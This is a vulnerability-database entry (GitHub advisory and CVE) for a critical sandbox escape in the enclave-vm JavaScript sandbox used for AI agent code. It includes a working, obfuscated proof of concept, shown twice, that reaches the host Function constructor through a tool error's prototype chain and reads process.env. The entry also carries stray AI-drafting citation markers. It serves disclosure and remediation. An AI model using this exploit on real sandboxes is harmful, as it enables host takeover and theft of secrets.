Vulnerability-Lookup

GHSA-7QM7-455J-5P63

Vulnerability from github – Published: 2026-01-14 16:52 – Updated: 2026-01-15 17:46

Summary

enclave-vm Vulnerable to Sandbox Escape via Host Error Prototype Chain

Details

A critical sandbox escape vulnerability exists in enclave-vm (affected: < 2.6.0, patched: 2.7.0) that can allow untrusted, sandboxed JavaScript to execute arbitrary code in the host Node.js runtime.

When a tool invocation fails, enclave-vm exposes a host-side Error object to sandboxed code. This Error object retains its host realm prototype chain, which can be traversed to reach the host Function constructor:

Error instance → Error.prototype → Error constructor → Function constructor

With access to the host Function constructor, an attacker can compile and execute arbitrary JavaScript in the host context — bypassing the sandbox boundary and potentially gaining access to sensitive resources such as process.env, filesystem, and network.

This breaks enclave-vm’s core security guarantee of isolating untrusted code.

Ecosystem Impact (FrontMCP / CodeCall)

FrontMCP is a TypeScript-first framework for building MCP servers, and the CodeCall plugin enables models to orchestrate large toolsets by generating and executing JavaScript plans.

Enclave is the defense-in-depth sandbox layer behind CodeCall (AST validation + runtime sandboxing). If you use FrontMCP CodeCall for agent tool execution, you should treat this as an urgent upgrade and ensure your runtime is on a patched enclave-vm version.

Live Playground (Safe Exploration & Testing)

To explore Enclave’s execution model (AgentScript + tool calls) and validate your integration behavior, use the live playground:

EnclaveVM Playground: https://enclave.agentfront.dev

This is the quickest way to understand the sandbox / tool-call flow and confirm your environment is running a patched setup.

Timeline (Fast Fix)

Fix released: enclave-vm@2.7.0 (Jan 9, 2026)
Advisory published: Jan 13, 2026

Proof of Concept

⚠️ For defensive validation and maintainers. Do not run PoCs on hosts you don’t own/control.

Click to expand PoC

// Vector 35: The Host Error Escape
// Purpose: Trigger a Host-side error and traverse its prototype chain
// to reach the Host Function constructor.

const s = (...args) => String.fromCharCode(...args);

const kCon    = s(99,111,110,115,116,114,117,99,116,111,114); // "constructor"
const kProto  = s(95,95,112,114,111,116,111,95,95);           // "__proto__"
const kLookup = s(95,95,108,111,111,107,117,112,71,101,116,116,101,114,95,95);
const kCode   = s(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,101,110,118);
const kPtype  = s(112,114,111,116,111,116,121,112,101);

try {
    const ObjectProto = Object[kPtype];
    const lookup = ObjectProto[kLookup];
    const getProtoNative = lookup.call(ObjectProto, kProto);

    let hostError;
    try {
        await callTool('THIS_TOOL_DOES_NOT_EXIST_XYZ', {});
    } catch (e) {
        hostError = e;
    }

    const errProto = getProtoNative.call(hostError);
    const ErrorCtor = errProto[kCon];
    const HostFunc = ErrorCtor[kCon];

    const exploitFn = HostFunc(kCode);
    return exploitFn();
} catch (e) {
    return e.message;
}
````

</details>

---

### Mitigation / Remediation

**Immediate action:**

* Upgrade **enclave-vm** to **2.7.0+**

**Defense-in-depth guidance:**

* Re-create all Error objects crossing the sandbox boundary **inside the sandbox realm**
* Strip / freeze prototype chains of host objects
* Prevent access to host `Function` constructors
* Harden tool error handling to avoid leaking host-native objects

---

### References

* GitHub Security Advisory: [https://github.com/agentfront/enclave/security/advisories/GHSA-7qm7-455j-5p63](https://github.com/agentfront/enclave/security/advisories/GHSA-7qm7-455j-5p63)
* npm package: [https://www.npmjs.com/package/enclave-vm](https://www.npmjs.com/package/enclave-vm)
* Enclave repo: [https://github.com/agentfront/enclave](https://github.com/agentfront/enclave)
* FrontMCP docs: [https://agentfront.dev/docs](https://agentfront.dev/docs)
* CodeCall plugin overview: [https://agentfront.dev/docs/plugins/overview](https://agentfront.dev/docs/plugins/overview)
* EnclaveVM Playground: [https://enclave.agentfront.dev/](https://enclave.agentfront.dev)

Factual hooks (for correctness): - GHSA page confirms **affected `<2.6.0`** and **patched `2.7.0`**, plus CVSS 10.0 and the exact vulnerability description. :contentReference[oaicite:0]{index=0} - FrontMCP docs explicitly describe **CodeCall** and that it uses **Enclave (AST validation + runtime sandboxing)**. :contentReference[oaicite:1]{index=1} - FrontMCP positioning (“TypeScript-first framework for MCP…”) is stated in the docs. :contentReference[oaicite:2]{index=2} - Enclave repo links the **Live Demo** at `enclave.agentfront.dev`. :contentReference[oaicite:3]{index=3} - Release listing shows `enclave-vm@2.7.0` dated **Jan 9** (fast fix signal). :contentReference[oaicite:4]{index=4} ::contentReference[oaicite:5]{index=5}

Severity ?

10.0 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "enclave-vm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22686"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-14T16:52:30Z",
    "nvd_published_at": "2026-01-14T00:15:49Z",
    "severity": "CRITICAL"
  },
  "details": "A critical sandbox escape vulnerability exists in **enclave-vm** (affected: **\u003c 2.6.0**, patched: **2.7.0**) that can allow untrusted, sandboxed JavaScript to execute arbitrary code in the **host Node.js runtime**.\n\nWhen a tool invocation fails, enclave-vm exposes a **host-side Error object** to sandboxed code. This Error object retains its **host realm prototype chain**, which can be traversed to reach the **host `Function` constructor**:\n\n`Error instance \u2192 Error.prototype \u2192 Error constructor \u2192 Function constructor`\n\nWith access to the host `Function` constructor, an attacker can compile and execute arbitrary JavaScript in the host context \u2014 bypassing the sandbox boundary and potentially gaining access to sensitive resources such as `process.env`, filesystem, and network.\n\nThis breaks enclave-vm\u2019s core security guarantee of isolating untrusted code.\n\n---\n\n### Ecosystem Impact (FrontMCP / CodeCall)\n\n**FrontMCP** is a TypeScript-first framework for building MCP servers, and the **CodeCall plugin** enables models to orchestrate large toolsets by generating and executing JavaScript plans.\n\n**Enclave is the defense-in-depth sandbox layer behind CodeCall** (AST validation + runtime sandboxing). If you use FrontMCP **CodeCall** for agent tool execution, you should treat this as an urgent upgrade and ensure your runtime is on a patched enclave-vm version.\n\n---\n\n### Live Playground (Safe Exploration \u0026 Testing)\n\nTo explore Enclave\u2019s execution model (AgentScript + tool calls) and validate your integration behavior, use the live playground:\n\n- **EnclaveVM Playground:** https://enclave.agentfront.dev\n\nThis is the quickest way to understand the sandbox / tool-call flow and confirm your environment is running a patched setup.\n\n---\n\n### Timeline (Fast Fix)\n\n- **Fix released:** `enclave-vm@2.7.0` (Jan 9, 2026)\n- **Advisory published:** Jan 13, 2026\n\n---\n\n### Proof of Concept\n\n\u003e \u26a0\ufe0f For defensive validation and maintainers. Do not run PoCs on hosts you don\u2019t own/control.\n\n\u003cdetails\u003e\n\u003csummary\u003eClick to expand PoC\u003c/summary\u003e\n\n```javascript\n// Vector 35: The Host Error Escape\n// Purpose: Trigger a Host-side error and traverse its prototype chain\n// to reach the Host Function constructor.\n\nconst s = (...args) =\u003e String.fromCharCode(...args);\n\nconst kCon    = s(99,111,110,115,116,114,117,99,116,111,114); // \"constructor\"\nconst kProto  = s(95,95,112,114,111,116,111,95,95);           // \"__proto__\"\nconst kLookup = s(95,95,108,111,111,107,117,112,71,101,116,116,101,114,95,95);\nconst kCode   = s(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,101,110,118);\nconst kPtype  = s(112,114,111,116,111,116,121,112,101);\n\ntry {\n    const ObjectProto = Object[kPtype];\n    const lookup = ObjectProto[kLookup];\n    const getProtoNative = lookup.call(ObjectProto, kProto);\n\n    let hostError;\n    try {\n        await callTool(\u0027THIS_TOOL_DOES_NOT_EXIST_XYZ\u0027, {});\n    } catch (e) {\n        hostError = e;\n    }\n\n    const errProto = getProtoNative.call(hostError);\n    const ErrorCtor = errProto[kCon];\n    const HostFunc = ErrorCtor[kCon];\n\n    const exploitFn = HostFunc(kCode);\n    return exploitFn();\n} catch (e) {\n    return e.message;\n}\n````\n\n\u003c/details\u003e\n\n---\n\n### Mitigation / Remediation\n\n**Immediate action:**\n\n* Upgrade **enclave-vm** to **2.7.0+**\n\n**Defense-in-depth guidance:**\n\n* Re-create all Error objects crossing the sandbox boundary **inside the sandbox realm**\n* Strip / freeze prototype chains of host objects\n* Prevent access to host `Function` constructors\n* Harden tool error handling to avoid leaking host-native objects\n\n---\n\n### References\n\n* GitHub Security Advisory: [https://github.com/agentfront/enclave/security/advisories/GHSA-7qm7-455j-5p63](https://github.com/agentfront/enclave/security/advisories/GHSA-7qm7-455j-5p63)\n* npm package: [https://www.npmjs.com/package/enclave-vm](https://www.npmjs.com/package/enclave-vm)\n* Enclave repo: [https://github.com/agentfront/enclave](https://github.com/agentfront/enclave)\n* FrontMCP docs: [https://agentfront.dev/docs](https://agentfront.dev/docs)\n* CodeCall plugin overview: [https://agentfront.dev/docs/plugins/overview](https://agentfront.dev/docs/plugins/overview)\n* EnclaveVM Playground: [https://enclave.agentfront.dev/](https://enclave.agentfront.dev)\n\n```\n\nFactual hooks (for correctness):\n- GHSA page confirms **affected `\u003c2.6.0`** and **patched `2.7.0`**, plus CVSS 10.0 and the exact vulnerability description. :contentReference[oaicite:0]{index=0}  \n- FrontMCP docs explicitly describe **CodeCall** and that it uses **Enclave (AST validation + runtime sandboxing)**. :contentReference[oaicite:1]{index=1}  \n- FrontMCP positioning (\u201cTypeScript-first framework for MCP\u2026\u201d) is stated in the docs. :contentReference[oaicite:2]{index=2}  \n- Enclave repo links the **Live Demo** at `enclave.agentfront.dev`. :contentReference[oaicite:3]{index=3}  \n- Release listing shows `enclave-vm@2.7.0` dated **Jan 9** (fast fix signal). :contentReference[oaicite:4]{index=4}\n::contentReference[oaicite:5]{index=5}",
  "id": "GHSA-7qm7-455j-5p63",
  "modified": "2026-01-15T17:46:45Z",
  "published": "2026-01-14T16:52:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/agentfront/enclave/security/advisories/GHSA-7qm7-455j-5p63"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22686"
    },
    {
      "type": "WEB",
      "url": "https://github.com/agentfront/enclave/commit/ed8bc438b2cd6e6f0b5f2de321e5be6f0169b5a1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/agentfront/enclave"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "enclave-vm Vulnerable to Sandbox Escape via Host Error Prototype Chain"
}

CVE-2026-22686 (GCVE-0-2026-22686)

Vulnerability from cvelistv5 – Published: 2026-01-13 23:11 – Updated: 2026-01-14 14:33

Title

Sandbox Escape via Host Error Prototype Chain in enclave-vm

Summary

Enclave is a secure JavaScript sandbox designed for safe AI agent code execution. Prior to 2.7.0, there is a critical sandbox escape vulnerability in enclave-vm that allows untrusted, sandboxed JavaScript code to execute arbitrary code in the host Node.js runtime. When a tool invocation fails, enclave-vm exposes a host-side Error object to sandboxed code. This Error object retains its host realm prototype chain, which can be traversed to reach the host Function constructor. An attacker can intentionally trigger a host error, then climb the prototype chain. Using the host Function constructor, arbitrary JavaScript can be compiled and executed in the host context, fully bypassing the sandbox and granting access to sensitive resources such as process.env, filesystem, and network. This breaks enclave-vm’s core security guarantee of isolating untrusted code. This vulnerability is fixed in 2.7.0.

Severity ?

10 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-693 - Protection Mechanism Failure
CWE-94 - Improper Control of Generation of Code ('Code Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/agentfront/enclave/security/ad…	x_refsource_CONFIRM
	https://github.com/agentfront/enclave/commit/ed8b…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	agentfront	enclave	Affected: < 2.7.0

Show details on NVD website